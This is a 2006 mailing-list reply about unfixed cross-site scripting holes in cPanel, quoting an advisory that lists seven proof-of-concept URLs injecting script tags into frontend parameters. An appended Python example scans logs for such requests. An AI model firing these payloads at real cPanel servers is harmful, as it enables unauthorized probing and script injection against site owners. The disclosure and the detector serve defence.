On 3/13/2004 I notified cPanel that they had major XSS issues in their backend... beyond what I was actually sending them or documenting, and they should fix them. They agreed.<br><br>However, based on this, it doesn't look like they've done much in the two years since I posted:
<br> <a href="http://www.cirt.net/advisories/cpanel_xss.shtml">http://www.cirt.net/advisories/cpanel_xss.shtml</a><br><br><br><div><span class="gmail_quote">On 2/2/06, <b class="gmail_sendername"><a href="mailto:simo@morx.org">simo@morx.org</a></b> &lt;<a href="mailto:simo@morx.org">simo@morx.org</a>&gt; wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Title: cPanel Multiple Cross Site Scripting<br>Author: Simo Ben youssef aka _6mO_HaCk &lt;simo_at_morx_org&gt;<br>Affected scripts with proof of concept exploit:<br><br>
<a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=">http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email=</a>&lt;script&gt;alert('vul')&lt;/script&gt;&amp;domain=<br>
<a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=">http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email=</a>&lt;script&gt;alert('vul')&lt;/script&gt;&amp;domain=xxx<br>
<a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0">http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0</a>"&gt;&lt;script&gt;alert('vul')&lt;/script&gt;<br>
<a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006&amp;domain=xxx&amp;target=">http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006&amp;domain=xxx&amp;target=</a>"&gt;&lt;script&gt;alert('vul')&lt;/script&gt;<br>
<a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006&amp;domain=xxx">http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006&amp;domain=xxx</a>"&gt;&lt;script&gt;alert('vul')&lt;/script&gt;&amp;target=xxx<br>
<a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006">http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&amp;year=2006</a>"&gt;&lt;script&gt;alert('vul')&lt;/script&gt;&amp;domain=xxx&amp;target=xxx<br>
<a href="http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan">http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan</a>"&gt;&lt;script&gt;alert('vul')&lt;/script&gt;&amp;year=2006&amp;domain=xxx&amp;target=xxx<br></blockquote></div><br>-- <br><br>
<a href="http://www.cirt.net">http://www.cirt.net</a> | <a href="http://www.osvdb.org/">http://www.osvdb.org/</a>
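<br><br>
A log-triage sketch for the scripts named in the advisory above, added here as an example and not part of either message: it flags requests to those scripts whose query parameters decode to HTML markup characters. The function names and the combined-log-style sample lines are constructed for illustration, and the log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script names taken from the advisory; the theme directory ("xcontroller")
# differs between installs, so only the /frontend/ prefix is matched.
AFFECTED = ("editquota.html", "dodelpop.html", "diskusage.html",
            "stats/detailbw.html")
# Characters that let a reflected value leave an HTML attribute or text node.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-log-style line (assumed format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for markup sent to an affected script."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not (url.path.startswith("/frontend/") and url.path.endswith(AFFECTED)):
        return []
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = unquote(value)  # second decode catches double-encoded input
        if MARKUP.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_number, hits)] for every line with at least one hit."""
    found = [(n, suspicious_params(line)) for n, line in enumerate(lines, 1)]
    return [(n, hits) for n, hits in found if hits]

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - u [02/Feb/2006:10:00:01 +0000] "GET /frontend/xcontroller/'
    'stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target=%22%3E%3Cscript'
    '%3Ealert(%27vul%27)%3C/script%3E HTTP/1.1" 200 5120',
    '203.0.113.7 - u [02/Feb/2006:10:00:09 +0000] "GET /frontend/xcontroller/'
    'editquota.html?email=%253Cscript%253Ealert(1)%253C/script%253E&domain= '
    'HTTP/1.1" 200 2048',
    '198.51.100.4 - u [02/Feb/2006:10:01:30 +0000] "GET /frontend/xcontroller/'
    'diskusage.html?showtree=0 HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    for line_number, hits in scan(SAMPLE_LOG):
        print(line_number, hits)
```

A hit is a triage signal rather than proof of exploitation, since a legitimate value can contain a quote character.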